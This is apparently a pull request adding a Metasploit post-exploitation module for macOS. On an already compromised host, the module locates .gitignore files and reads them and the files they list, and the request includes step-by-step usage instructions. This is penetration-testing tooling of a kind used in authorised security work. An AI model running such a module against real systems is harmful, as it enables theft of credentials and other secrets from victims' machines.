### PR TITLE
OSX Post exploitation .gitignore retrieval

### DIFF
--- a/modules/post/osx/gather/gitignore.rb
+++ b/modules/post/osx/gather/gitignore.rb
@@ -1,0 +1,34 @@
+class MetasploitModule < Msf::Post
+	include Msf::Post::File
+	def initialize(info={})
+		super( update_info( info,
+			'Name' => 'Git Ignore Retriever',
+			'Description' => %q{This module finds potentially sensitive items by finding .gitignore files.
+			},
+			'License' => MSF_LICENSE,
+			'Author' => [ 'N!ght Jmp'],
+			'Platform' => [ 'osx' ],
+			'SessionTypes' => [ "meterpreter", "shell" ]
+		))
+		register_options([
+			OptString.new('MODE', [false, 'Gitignore retrieval modes: 1). Find gitignore file locations. 2). Retrieve specific gitignore/file contents','']),
+			OptString.new('FILE', [false, 'Filepath of gitignore/file to retrieve (For mode 2)',''])
+		])
+	end
+
+	def run
+		mode = datastore['MODE'].to_i
+		file = datastore['FILE']
+		if mode == 1
+			print_status("Fetching .gitignore files")
+			gitlist = cmd_exec('find ~ -name ".gitignore" 2>/dev/null').chomp
+			for ignore in gitlist.split()
+				print_good("#{ignore}")
+			end
+		elsif mode == 2
+			gitignore = cmd_exec("cat #{file}").chomp
+			print_good("#{file}")
+			print_good("#{gitignore}")
+		end
+	end
+end


### PR DESCRIPTION
This post exploitation module is meant to locate all .gitignore files in a user's home directory as well as retrieve the contents of both the .gitignore as well as the files contained in the .gitignore. There are two modes. Mode 1 finds the .gitignore files. Mode 2 retrieves the file. You must set the FILE path with the gitignore file you'd like to retrieve. This could be used to retrieve potentially sensitive artifacts.

After establishing a meterpreter session:
* use post/osx/gather/gitignore
* set mode 1
* set session n (where n is the session in which you'd like to run the module)
* run

The module will take some time to complete but will recursively search all directories from the user's home directory for .gitignore files and then print the absolute path of each file it finds. Copy the path of whichever gitignore you'd like to read and paste into the FILE variable.

* set mode 2
* set file /path/to/.gitignore
* run

At this point, the module will display the contents of the gitignore file. If it contains something of interest, you can copy the filename and replace it in the absolute path for which you found the .gitignore. 

* set file /path/to/artifact
* run

This will retrieve the contents of the artifact you are looking to read.

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

If you are opening a PR for a new module that exploits a **specific** piece of hardware or requires a **complex or hard-to-find** testing environment, we recommend that you send us a demo of your module executing correctly. Seeing your module in action will help us review your PR faster!

Specific Hardware Examples:
* Switches
* Routers
* IP Cameras
* IoT devices

Complex Software Examples:
* Expensive proprietary software
* Software with an extensive installation process
* Software that requires exploit testing across multiple significantly different versions
* Software without an English language UI

We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!

Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metaspolit.com](mailto:msfdev@metaspolit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
